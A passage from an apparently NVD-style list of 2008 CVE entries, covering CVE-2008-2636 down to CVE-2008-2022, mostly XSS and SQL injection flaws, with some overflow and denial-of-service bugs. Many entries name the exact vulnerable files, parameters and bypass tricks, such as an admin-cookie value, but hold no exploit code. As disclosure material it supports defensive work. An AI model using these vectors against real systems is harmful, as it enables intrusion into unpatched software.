the sql_matchscope parameter in vdesk/admincon/index.php. [CVE-2008-2636] The HTTP service on the Cisco Linksys WRH54G with firmware 1.01.03 allows remote attackers to cause a denial of service (management interface outage) or possibly execute arbitrary code via a URI that begins with a "/./" sequence, contains many instances of a "front_page" sequence, and ends with a ".asp" sequence. [CVE-2008-2635] Multiple directory traversal vulnerabilities in BitKinex 2.9.3 allow remote FTP and WebDAV servers to create or overwrite arbitrary files via a .. (dot dot) in (1) a response to a LIST command from the BitKinex FTP client and (2) a response to a PROPFIND command from the BitKinex WebDAV client. NOTE: this can be leveraged for code execution by writing to a Startup folder. [CVE-2008-2631] The WordClient interface in Alt-N Technologies MDaemon 9.6.5 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted HTTP POST request. NOTE: the provenance of this information is unknown [CVE-2008-2603] Unspecified vulnerability in the Resource Manager component in Oracle Database 10.1.0.5, 10.2.0.4, and 11.1.0.6, and Database Control in Enterprise Manager, has unknown impact and remote authenticated attack vectors. NOTE: the previous information was obtained from the Oracle July 2008 CPU. Oracle has not commented on reliable researcher claims that this is a cross-site scripting (XSS) issue that allows remote attackers to inject arbitrary web script or HTML via the REFRESHCHOICE parameter in multiple web pages. [CVE-2008-2582] Unspecified vulnerability in the WebLogic Server component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 has unknown impact and remote attack vectors. [CVE-2008-2581] Unspecified vulnerability in the WebLogic Server component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 has unknown impact and remote attack vectors related to UDDI Explorer. [CVE-2008-2580] Unspecified vulnerability in the WebLogic Server component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, and 9.0 has unknown impact and remote attack vectors. [CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors. [CVE-2008-2578] Unspecified vulnerability in the WebLogic Server component in Oracle BEA Product Suite 10.0 and 9.2 MP1 has unknown impact and local attack vectors. [CVE-2008-2577] Unspecified vulnerability in the WebLogic Server component in Oracle BEA Product Suite 9.2 MP1 has unknown impact and remote authenticated attack vectors. [CVE-2008-2576] Unspecified vulnerability in the WebLogic Server component in Oracle BEA Product Suite 9.2, 9.1, 9.0, and 8.1 SP6 has unknown impact and local attack vectors. [CVE-2008-2567] Cross-site scripting (XSS) vulnerability in Fenriru Sleipnir 2.7.1 Release2 and earlier, Portable Sleipnir 2.7.1 Release2 and earlier, and Grani 3.1 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to a history mechanism and favorites search, a different vulnerability than CVE-2007-6002. [CVE-2008-2566] Multiple cross-site scripting (XSS) vulnerabilities in PHP Address Book 3.1.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the group parameter to (1) index.php or (2) the default URI. [CVE-2008-2563] Multiple cross-site scripting (XSS) vulnerabilities in (1) dsp_main.php and (2) dsp_task_editor.php in SamTodo 1.1 allow remote attackers to inject arbitrary web script or HTML via the (a) tid parameter in a main.taskeditor edit action, and the (b) completed parameter in a main.default action, to index.php. [CVE-2008-2561] Multiple cross-site scripting (XSS) vulnerabilities in 427BB 2.3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) PATH_INFO to (a) register.php, (b) reminder.php, and (c) search.php [CVE-2008-2557] Cross-site scripting (XSS) vulnerability in CRE Loaded 6.2.13.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) Links and (2) Links Submit pages. [CVE-2008-2553] Cross-site scripting (XSS) vulnerability in Slashdot Like Automated Storytelling Homepage (Slash) (aka Slashcode) R_2_5_0_94 and earlier allows remote attackers to inject arbitrary web script or HTML via the userfield parameter. [CVE-2008-2550] Unspecified vulnerability in the Web Services Security component in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.17 has unknown impact and attack vectors related to an attribute in the SOAP security header. [CVE-2008-2533] Multiple cross-site scripting (XSS) vulnerabilities in Phoenix View CMS Pre Alpha2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) ltarget parameter to (a) admin/admin_frame.php and the (2) conf parameter to (b) gbuch.admin.php, (c) links.admin.php, (d) menue.admin.php, (e) news.admin.php, and (f) todo.admin.php in admin/module/. [CVE-2008-2531] Cross-site scripting (XSS) vulnerability in the search script in Build A Niche Store (BANS) 3.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2008-2527] Cross-site scripting (XSS) vulnerability in view.php in ActualScripts ActualAnalyzer Server 8.37 and earlier, ActualAnalyzer Gold 7.74 and earlier, ActualAnalyzer Pro 6.95 and earlier, and ActualAnalyzer Lite 2.78 and earlier allows remote attackers to inject arbitrary web script or HTML via the language parameter. [CVE-2008-2526] Cross-site scripting (XSS) vulnerability in the WT Gallery (aka wt_gallery) extension 2.6.2 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-2525] Cross-site scripting (XSS) vulnerability in the Event Database (aka rlmp_eventdb) extension before 1.1.2 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-2518] Cross-site scripting (XSS) vulnerability in the advanced search mechanism (webapps/search/advanced.jsp) in Sun Java System Web Server 6.1 before SP9 and 7.0 before Update 3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, probably related to the next parameter. [CVE-2008-2508] Cross-site scripting (XSS) vulnerability in news.php in Tr Script News 2.1 allows remote attackers to inject arbitrary web script or HTML via the "nb" parameter in voir mode. [CVE-2008-2507] Cross-site scripting (XSS) vulnerability in Calcium40.pl in Brown Bear Software Calcium 3.10 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the CalendarName parameter in a ShowIt action. [CVE-2008-2506] Multiple SQL injection vulnerabilities in Simpel Side Weblosning 1 through 4 allow remote attackers to execute arbitrary SQL commands via the (1) mainid and (2) id parameters to index2.php. [CVE-2008-2505] Cross-site scripting (XSS) vulnerability in result.php in Simpel Side Weblosning 1 through 4 allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2008-2502] Unspecified vulnerability in the web server in eMule X-Ray before 1.4 allows remote attackers to trigger memory corruption via unknown attack vectors. [CVE-2008-2500] Cross-site scripting (XSS) vulnerability in the MOStlyContent Editor (MOStlyCE) component before 3.0 for Mambo allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-2496] Multiple cross-site scripting (XSS) vulnerabilities in Quate CMS 0.3.4 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) index.php, (2) login.php, and (3) credits.php in admin/, and (4) upgrade/index.php. [CVE-2008-2494] Cross-site scripting (XSS) vulnerability in index.php in Zina 1.0 RC3 allows remote attackers to inject arbitrary web script or HTML via the l parameter. [CVE-2008-2493] Cross-site scripting (XSS) vulnerability in post3/Book.asp in Campus Bulletin Board 3.4 allows remote attackers to inject arbitrary web script or HTML via the review parameter. [CVE-2008-2490] Cross-site scripting (XSS) vulnerability in the KJ Image Lightbox 2 (aka kj_imagelightbox2) extension 1.4.2 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified "user input." [CVE-2008-2487] SQL injection vulnerability in index.php in MAXSITE 1.10 and earlier allows remote attackers to execute arbitrary SQL commands via the category parameter in a webboard action. [CVE-2008-2485] Cross-site scripting (XSS) vulnerability in the URL redirection script (inc/url_redirection.inc.php) in PCPIN Chat before 6.11 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2008-2470] The InstallShield Update Service Agent ActiveX control in isusweb.dll allows remote attackers to cause a denial of service (memory corruption and browser crash) and possibly execute arbitrary code via a call to ExecuteRemote with a URL that results in a 404 error response. [CVE-2008-2462] Cross-site scripting (XSS) vulnerability in the viewfile documentation command in Caucho Resin before 3.0.25, and 3.1.x before 3.1.4, allows remote attackers to inject arbitrary web script or HTML via the file parameter. [CVE-2008-2458] Cross-site scripting (XSS) vulnerability in index.php in Starsgames Control Panel 4.6.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the st parameter. [CVE-2008-2452] Cross-site scripting (XSS) vulnerability in the Questionaire (aka pbsurvey) extension 1.2.0 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-2450] Multiple cross-site scripting (XSS) vulnerabilities in the Statistics (aka ke_stats) extension 0.1.2 and earlier for TYPO3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-2449] Multiple cross-site scripting (XSS) vulnerabilities in Isaac McGowan phpInstantGallery 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) gallery parameter to (a) index.php and (b) image.php, and the (2) imgnum parameter to image.php. NOTE: the provenance of this information is unknown [CVE-2008-2446] Multiple SQL injection vulnerabilities in Web Group Communication Center (WGCC) 1.0.3 PreRelease 1 and earlier allow remote authenticated users to execute arbitrary SQL commands via the (1) userid parameter to (a) profile.php in a "show moreinfo" action [CVE-2008-2445] Cross-site scripting (XSS) vulnerability in profile.php in Web Group Communication Center (WGCC) 1.0.3 PreRelease 1 and earlier allows remote attackers to inject arbitrary web script or HTML via the userid parameter in a show action. [CVE-2008-2433] The web management console in Trend Micro OfficeScan 7.0 through 8.0, Worry-Free Business Security 5.0, and Client/Server/Messaging Suite 3.5 and 3.6 creates a random session token based only on the login time, which makes it easier for remote attackers to hijack sessions via brute-force attacks. NOTE: this can be leveraged for code execution through an unspecified "manipulation of the configuration." [CVE-2008-2422] SQL injection vulnerability in index.php in Web Slider 0.6 allows remote attackers to execute arbitrary SQL commands via the slide parameter in a slides action. NOTE: the provenance of this information is unknown [CVE-2008-2421] Cross-site scripting (XSS) vulnerability in the Web GUI in SAP Web Application Server (WAS) 7.0, Web Dynpro for ABAP (aka WD4A or WDA), and Web Dynpro for BSP allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the default URI under bc/gui/sap/its/webgui/. [CVE-2008-2417] SQL injection vulnerability in showQAnswer.asp in How2ASP.net Webboard 4.1 allows remote attackers to execute arbitrary SQL commands via the qNo parameter. [CVE-2008-2414] Cross-site scripting (XSS) vulnerability in send_email.php in AN Guestbook (ANG) 0.4 allows remote attackers to inject arbitrary web script or HTML via the postid parameter. [CVE-2008-2413] Cross-site scripting (XSS) vulnerability in glossaire.php in ACGV News 0.9.1 allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2008-2410] Cross-site scripting (XSS) vulnerability in the servlet engine and Web container in the Web Server service in IBM Lotus Domino before 7.0.3 FP1, and 8.x before 8.0.1, allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-2402] The Admin Server in Sun Java Active Server Pages (ASP) Server before 4.0.3 stores sensitive information under the web root with insufficient access control, which allows remote attackers to read password hashes and configuration data via direct requests for unspecified documents. [CVE-2008-2398] Cross-site scripting (XSS) vulnerability in index.php in AppServ Open Project 2.5.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter. [CVE-2008-2397] Cross-site scripting (XSS) vulnerability in search-results.dot in dotCMS 1.x allows remote attackers to inject arbitrary web script or HTML via the search_query parameter. NOTE: the provenance of this information is unknown [CVE-2008-2379] Cross-site scripting (XSS) vulnerability in SquirrelMail before 1.4.17 allows remote attackers to inject arbitrary web script or HTML via a crafted hyperlink in an HTML part of an e-mail message. [CVE-2008-2356] SQL injection vulnerability in index.php in Archangel Weblog 0.90.02 and earlier allows remote attackers to execute arbitrary SQL commands via the post_id parameter. [CVE-2008-2351] Multiple SQL injection vulnerabilities in index.php in CMS WebManager-Pro allow remote attackers to execute arbitrary SQL commands via the (1) lang_id and (2) menu_id parameters. [CVE-2008-2344] Cross-site scripting (XSS) vulnerability in the air_filemanager 0.6.0 and earlier extension for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-2339] SQL injection vulnerability in index.php in Turnkey Web Tools SunShop Shopping Cart 3.5.1 allows remote attackers to execute arbitrary SQL commands via the id parameter in an item action, a different vector than CVE-2008-2038, CVE-2007-4597, and CVE-2007-2549. [CVE-2008-2335] Cross-site scripting (XSS) vulnerability in search_results.php in Vastal I-Tech phpVID 1.1 and 1.2 allows remote attackers to inject arbitrary web script or HTML via the query parameter. NOTE: some of these details are obtained from third party information. [CVE-2008-2333] Cross-site scripting (XSS) vulnerability in ldap_test.cgi in Barracuda Spam Firewall (BSF) before 3.5.11.025 allows remote attackers to inject arbitrary web script or HTML via the email parameter. [CVE-2008-2318] The WOHyperlink implementation in WebObjects in Apple Xcode tools before 3.1 appends local session IDs to generated non-local URLs, which allows remote attackers to obtain potentially sensitive information by reading the requests for these URLs. [CVE-2008-2317] WebCore in Apple Safari does not properly perform garbage collection of JavaScript document elements, which allows remote attackers to execute arbitrary code or cause a denial of service (heap corruption and application crash) via a reference to the ownerNode property of a copied CSSStyleSheet object of a STYLE element, as originally demonstrated on Apple iPhone before 2.0 and iPod touch before 2.0, a different vulnerability than CVE-2008-1590. [CVE-2008-2307] Unspecified vulnerability in WebKit in Apple Safari before 3.1.2, as distributed in Mac OS X before 10.5.4, and standalone for Windows and Mac OS X 10.4, allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via vectors involving JavaScript arrays that trigger memory corruption. [CVE-2008-2302] Cross-site scripting (XSS) vulnerability in the login form in the administration application in Django 0.91 before 0.91.2, 0.95 before 0.95.3, and 0.96 before 0.96.2 allows remote attackers to inject arbitrary web script or HTML via the URI of a certain previous request. [CVE-2008-2298] Admin.php in Web Slider 0.6 allows remote attackers to bypass authentication and gain privileges by setting the admin cookie to 1. [CVE-2008-2295] Cross-site scripting (XSS) vulnerability in rg_search.php in Rgboard 3.0.12, and possibly earlier versions, allows remote attackers to inject arbitrary web script or HTML via the s_text parameter and other unspecified vectors. [CVE-2008-2290] Unspecified vulnerability in the Agent user interface in Symantec Altiris Deployment Solution 6.8.x and 6.9.x before 6.9.176 allows local users to gain privileges via unknown attack vectors. [CVE-2008-2281] Cross-zone scripting vulnerability in the Print Table of Links feature in Internet Explorer 6.0, 7.0, and 8.0b allows user-assisted remote attackers to inject arbitrary web script or HTML in the Local Machine Zone via an HTML document with a link containing JavaScript sequences, which are evaluated by a resource script when a user prints this document. [CVE-2008-2280] Cross-site scripting (XSS) vulnerability in admin/index.php in Script PHP PicEngine 1.0 allows remote attackers to inject arbitrary web script or HTML via the l parameter. NOTE: the provenance of this information is unknown [CVE-2008-2274] Cross-site scripting (XSS) vulnerability in the sr_feuser_register 1.4.0, 1.6.0, 2.2.1 to 2.2.7, 2.3.0 to 2.3.6, 2.4.0, and 2.5.0 to 2.5.9 extension for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-2264] Cross-site scripting (XSS) vulnerability in index.php in CyrixMED 1.4 allows remote attackers to inject arbitrary web script or HTML via the msg_erreur parameter. NOTE: the provenance of this information is unknown [CVE-2008-2248] Cross-site scripting (XSS) vulnerability in Outlook Web Access (OWA) for Exchange Server 2003 SP2 allows remote attackers to inject arbitrary web script or HTML via unspecified HTML, a different vulnerability than CVE-2008-2247. [CVE-2008-2247] Cross-site scripting (XSS) vulnerability in Outlook Web Access (OWA) for Exchange Server 2003 SP2 allows remote attackers to inject arbitrary web script or HTML via unspecified e-mail fields, a different vulnerability than CVE-2008-2248. [CVE-2008-2240] Stack-based buffer overflow in the Web Server service in IBM Lotus Domino before 7.0.3 FP1, and 8.x before 8.0.1, allows remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a long Accept-Language HTTP header. [CVE-2008-2236] Cross-site scripting (XSS) vulnerability in blosxom.cgi in Blosxom before 2.1.2 allows remote attackers to inject arbitrary web script or HTML via the flav parameter (flavour variable). NOTE: some of these details are obtained from third party information. [CVE-2008-2221] Unspecified vulnerability in the Java plugin in IBM WebSphere Application Server 5.0.2 allows untrusted applets to gain privileges via unknown attack vectors. [CVE-2008-2219] Cross-site scripting (XSS) vulnerability in install.php in C-News.fr C-News 1.0.1 allows remote attackers to inject arbitrary web script or HTML via the etape parameter. [CVE-2008-2213] Multiple cross-site scripting (XSS) vulnerabilities in admin/inc/footer.php in Maian Links 3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) msg_script2 and (2) msg_script3 parameters. [CVE-2008-2212] Multiple cross-site scripting (XSS) vulnerabilities in Maian Cart 1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) msg_adminheader, (2) msg_adminheader2, (3) msg_adminheader3, (4) msg_adminheader4, and unspecified other parameters to admin/inc/header.php [CVE-2008-2211] Multiple cross-site scripting (XSS) vulnerabilities in admin/inc/footer.php in Maian Guestbook 3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) msg_script2 and (2) msg_script3 parameters. [CVE-2008-2210] Multiple cross-site scripting (XSS) vulnerabilities in Maian Support 1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) msg_script, (2) msg_script2, and (3) msg_script3 parameters to admin/inc/footer.php [CVE-2008-2209] Multiple cross-site scripting (XSS) vulnerabilities in admin/inc/header.php in Maian Greeting 2.1 allow remote attackers to inject arbitrary web script or HTML via the (1) msg_script and (2) msg_script2 parameters. [CVE-2008-2207] Cross-site scripting (XSS) vulnerability in admin/index.php in Maian Gallery 2.0 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter in a search action. [CVE-2008-2206] Multiple cross-site scripting (XSS) vulnerabilities in Maian Music 1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) keywords parameter in a search action to index.php, and the (2) msg_script parameter to admin/inc/footer.php. [CVE-2008-2204] Multiple cross-site scripting (XSS) vulnerabilities in admin/inc/header.php in Maian Search 1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) header, (2) header2, (3) header3, (4) header4, (5) header5, (6) header6, (7) header7, (8) header8, and (9) header9 parameters. [CVE-2008-2202] Multiple cross-site scripting (XSS) vulnerabilities in Maian Uploader 4.0 allow remote attackers to inject arbitrary web script or HTML via the (1) keywords parameter to upload/admin/index.php in a search action, the (2) msg_charset and (3) msg_header9 parameters to admin/inc/header.php, and the (4) keywords parameter to index.php in a search action. [CVE-2008-2201] Multiple cross-site scripting (XSS) vulnerabilities in admin/inc/header.php in Maian Recipe 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) header, (2) header2, (3) header3, (4) header4, (5) header5, (6) header6, (7) header7, (8) header8, and (9) header9 parameters. [CVE-2008-2200] Multiple cross-site scripting (XSS) vulnerabilities in Maian Weblog 4.0 allow remote attackers to inject arbitrary web script or HTML via the (1) keywords parameter to admin/index.php in a blogs search action, the (2) msg_charset and (3) msg_header9 parameters to admin/inc/header.php, and the (4) keywords parameter to index.php in a search action. [CVE-2008-2197] SQL injection vulnerability in the blogwriter module 2.0 for Miniweb allows remote attackers to execute arbitrary SQL commands via the historymonth parameter to index.php. [CVE-2008-2196] Cross-site scripting (XSS) vulnerability in admin.php in LifeType 1.2.8 allows remote attackers to inject arbitrary web script or HTML via the newBlogUserName parameter in an addBlogUser action, a different vector than CVE-2008-2178. [CVE-2008-2188] Multiple cross-site scripting (XSS) vulnerabilities in EJ3 BlackBook 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) bookCopyright and (2) ver parameters to (a) footer.php, and the (3) bookName, (4) bookMetaTags, and (5) estiloCSS parameters to (b) header.php. [CVE-2008-2186] Cross-site scripting (XSS) vulnerability in index.php in Chilek Content Management System (aka ChiCoMaS) 2.0.4 allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2008-2182] Cross-site scripting (XSS) vulnerability in the powermail extension before 1.1.10 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-2181] Multiple cross-site scripting (XSS) vulnerabilities in search.php in cpLinks 1.03 allow remote attackers to inject arbitrary web script or HTML via the (1) search_text and (2) search_category parameters. NOTE: the XSS reportedly occurs in a forced SQL error message. NOTE: some of these details are obtained from third party information. [CVE-2008-2179] Cross-site scripting (XSS) vulnerability in SystemList.jsp in SysAid 5.1.08 allows remote attackers to inject arbitrary web script or HTML via the searchField parameter. NOTE: the provenance of this information is unknown [CVE-2008-2178] Cross-site scripting (XSS) vulnerability in admin.php in LifeType 1.2.7 allows remote attackers to inject arbitrary web script or HTML via the searchTerms parameter in an editArticleCategories operation (aka an admin category search). [CVE-2008-2176] Cross-site scripting (XSS) vulnerability in admin/category.php in Zomplog 3.8.2 allows remote attackers to inject arbitrary web script or HTML via the catname parameter. [CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page. [CVE-2008-2167] Cross-site scripting (XSS) vulnerability in ZyXEL ZyWALL 100 allows remote attackers to inject arbitrary web script or HTML via the Referer header, which is not properly handled in a 404 Error page. [CVE-2008-2166] Cross-site scripting (XSS) vulnerability in the search module in Sun Java System Web Server 6.1 before SP9 and 7.0 before Update 2 allows remote attackers to inject arbitrary web script or HTML via unknown parameters in index.jsp. [CVE-2008-2165] Cross-site scripting (XSS) vulnerability in AccessCodeStart.asp in Cisco Building Broadband Service Manager (BBSM) Captive Portal 5.3 allows remote attackers to inject arbitrary web script or HTML via the msg parameter. [CVE-2008-2163] Cross-site scripting (XSS) vulnerability in IBM Lotus Quickr 8.1 before Hotfix 5 for Windows and AIX, and before Hotfix 3 for i5/OS, allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to "WYSIWYG editors." [CVE-2008-2162] Cross-site scripting (XSS) vulnerability in SonicWall Email Security 6.1.1 allows remote attackers to inject arbitrary web script or HTML via the Host header in a request to a non-existent web page, which is not properly sanitized in an error page. [CVE-2008-2158] Multiple stack-based buffer overflows in the Command Line Interface process in the Server Agent in EMC AlphaStor 3.1 SP1 for Windows allow remote attackers to execute arbitrary code via crafted TCP packets to port 41025. [CVE-2008-2143] Unspecified versions of Microsoft Outlook Web Access (OWA) use the Cache-Control: no-cache HTTP directive instead of no-store, which might cause web browsers that follow RFC-2616 to cache sensitive information. [CVE-2008-2136] Memory leak in the ipip6_rcv function in net/ipv6/sit.c in the Linux kernel 2.4 before 2.4.36.5 and 2.6 before 2.6.25.3 allows remote attackers to cause a denial of service (memory consumption) via network traffic to a Simple Internet Transition (SIT) tunnel interface, related to the pskb_may_pull and kfree_skb functions, and management of an skb reference count. [CVE-2008-2133] Cross-site scripting (XSS) vulnerability in the Journal module in Tru-Zone Nuke ET 3.x allows remote attackers to inject arbitrary web script or HTML via the title parameter in a new entry, as demonstrated by a CSS property in the STYLE attribute of a DIV element, a different vulnerability than CVE-2008-1873. [CVE-2008-2131] Cross-site scripting (XSS) vulnerability in mvnForum 1.1 GA allows remote authenticated users to inject arbitrary web script or HTML via the topic field, which is later displayed by user/viewthread.jsp through use of the "quick reply button." [CVE-2008-2127] Cross-site scripting (XSS) vulnerability in search.php in CMS Faethon 2.2 Ultimate allows remote attackers to inject arbitrary web script or HTML via the what parameter. NOTE: some of these details are obtained from third party information. [CVE-2008-2126] Multiple cross-site scripting (XSS) vulnerabilities in Tux CMS 0.1 allow remote attackers to inject arbitrary web script or HTML via the (1) q parameter to index.php and the (2) returnURL parameter to tux-login.php. [CVE-2008-2123] Cross-site scripting (XSS) vulnerability in WGate in SAP Internet Transaction Server (ITS) 6.20 allows remote attackers to inject arbitrary web script or HTML via (1) a "<>" sequence in the ~service parameter to wgate.dll, or (2) Javascript splicing in the query string, a different vector than CVE-2006-5114. [CVE-2008-2120] Unspecified vulnerability in Sun Java System Application Server 7 2004Q2 before Update 6, Web Server 6.1 before SP8, and Web Server 7.0 before Update 1 allows remote attackers to obtain source code of JSP files via unknown vectors. [CVE-2008-2117] Cross-site scripting (XSS) vulnerability in pages/news.page.inc in Project Alumni 1.0.9 allows remote attackers to inject arbitrary web script or HTML via the year parameter in a news action to index.php, a different vector than CVE-2007-6126. [CVE-2008-2115] Multiple cross-site scripting (XSS) vulnerabilities in editor.php in ScriptsEZ.net Power Editor 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) te and (2) dir parameters in a tempedit action. [CVE-2008-2103] Cross-site scripting (XSS) vulnerability in Bugzilla 2.17.2 and later allows remote attackers to inject arbitrary web script or HTML via the id parameter to the "Format for Printing" view or "Long Format" bug list. [CVE-2008-2087] SQL injection vulnerability in search_result.php in Softbiz Web Host Directory Script, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the host_id parameter, a different vector than CVE-2005-3817. [CVE-2008-2086] Sun Java Web Start and Java Plug-in for JDK and JRE 6 Update 10 and earlier [CVE-2008-2082] Cross-site scripting (XSS) vulnerability in index.php in Siteman 2.0.x2 allows remote attackers to inject arbitrary web script or HTML via the module parameter, which leaks the path in an error message. [CVE-2008-2077] Unspecified vulnerability in Plain Black WebGUI 7.4.34 has unknown impact and attack vectors related to "data form list view." [CVE-2008-2075] Cross-site scripting (XSS) vulnerability in pic.php in AstroCam 2.5.0 through 2.7.3 allows remote attackers to inject arbitrary web script or HTML via the picfile parameter. [CVE-2008-2072] Cross-site scripting (XSS) vulnerability in index.php in Virtual Design Studio vlbook 1.21 allows remote attackers to inject arbitrary web script or HTML via the l parameter, a different vector than CVE-2006-3260. [CVE-2008-2070] The WHM interface 11.15.0 for cPanel 11.18 before 11.18.4 and 11.22 before 11.22.3 allows remote attackers to bypass XSS protection and inject arbitrary script or HTML via repeated, improperly-ordered "<" and ">" characters in the (1) issue parameter to scripts2/knowlegebase, (2) user parameter to scripts2/changeip, (3) search parameter to scripts2/listaccts, and other unspecified vectors. [CVE-2008-2068] Cross-site scripting (XSS) vulnerability in WordPress 2.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-2066] Cross-site scripting (XSS) vulnerability in bb_admin.php in miniBB 2.2a allows remote attackers to inject arbitrary web script or HTML via the whatus parameter in a searchusers2 action. NOTE: it was later reported that other versions before 3.0.1 are also vulnerable. [CVE-2008-2064] Multiple unspecified vulnerabilities in PhpGedView before 4.1.5 have unknown impact and attack vectors related to "a fundamental design flaw in the interface (API) to connect phpGedView with external programs like content management systems." [CVE-2008-2056] Cisco Adaptive Security Appliance (ASA) and Cisco PIX security appliance 8.0.x before 8.0(3)9 and 8.1.x before 8.1(1)1 allows remote attackers to cause a denial of service (device reload) via a crafted Transport Layer Security (TLS) packet to the device interface. [CVE-2008-2055] Cisco Adaptive Security Appliance (ASA) and Cisco PIX security appliance 7.1.x before 7.1(2)70, 7.2.x before 7.2(4), and 8.0.x before 8.0(3)10 allows remote attackers to cause a denial of service via a crafted TCP ACK packet to the device interface. [CVE-2008-2052] Open redirect vulnerability in redirect.php in Bitrix Site Manager 6.5 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the goto parameter. [CVE-2008-2048] Cross-site scripting (XSS) vulnerability in hpz/admin/Default.asp in Angelo-Emlak 1.0 allows remote attackers to inject arbitrary web script or HTML via the sayfa parameter. [CVE-2008-2046] Cross-site scripting (XSS) vulnerability in index.php in Softpedia SiteXS CMS 0.1.1 Pre-Alpha allows remote attackers to inject arbitrary web script or HTML via the user parameter. [CVE-2008-2041] Multiple unspecified vulnerabilities in eGroupWare before 1.4.004 have unspecified attack vectors and "grave" impact when the web server has write access to a directory under the web document root. [CVE-2008-2038] Multiple SQL injection vulnerabilities in admin/adminindex.php in Turnkey Web Tools SunShop Shopping Cart 4.1.0 allow remote authenticated administrators to execute arbitrary SQL commands via the (1) orderby and (2) sort parameters. NOTE: the provenance of this information is unknown [CVE-2008-2037] Multiple cross-site scripting (XSS) vulnerabilities in EditeurScripts EsContacts 1.0 allow remote authenticated users to inject arbitrary web script or HTML via the msg parameter to (1) login.php, (2) importer.php, (3) add_groupe.php, (4) contacts.php, (5) groupes.php, and (6) search.php. [CVE-2008-2035] Cross-site scripting (XSS) vulnerability in the Bluemoon, Inc. (1) BackPack 0.91 and earlier, (2) BmSurvey 0.84 and earlier, (3) newbb_fileup 1.83 and earlier, (4) News_embed (news_fileup) 1.44 and earlier, and (5) PopnupBlog 3.19 and earlier modules for XOOPS 2.0.x, XOOPS Cube 2.1, and ImpressCMS allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-2030] Cross-site scripting (XSS) vulnerability in installControl.php3 in F5 FirePass 4100 SSL VPN 5.4.2-5.5.2 and 6.0-6.2 allows remote attackers to inject arbitrary web script or HTML via the query string. NOTE: the provenance of this information is unknown [CVE-2008-2027] Open redirect vulnerability in WebID/IISWebAgentIF.dll in RSA Authentication Agent 5.3.0.258 for Web for IIS, when accessed via certain browsers such as Mozilla Firefox, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via an ftp URL in the url parameter to a Redirect action. [CVE-2008-2026] Cross-site scripting (XSS) vulnerability in WebID/IISWebAgentIF.dll in RSA Authentication Agent 5.3.0.258, and other versions before 5.3.3.378, allows remote attackers to inject arbitrary web script or HTML via a URL-encoded postdata parameter. NOTE: this is different than CVE-2005-1118, but it might be the same as CVE-2008-1470. [CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters." [CVE-2008-2024] Cross-site scripting (XSS) vulnerability in index.php in miniBB 2.2, and possibly earlier, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the glang[] parameter in a registernew action. [CVE-2008-2022] Mulatiple cross-site scripting 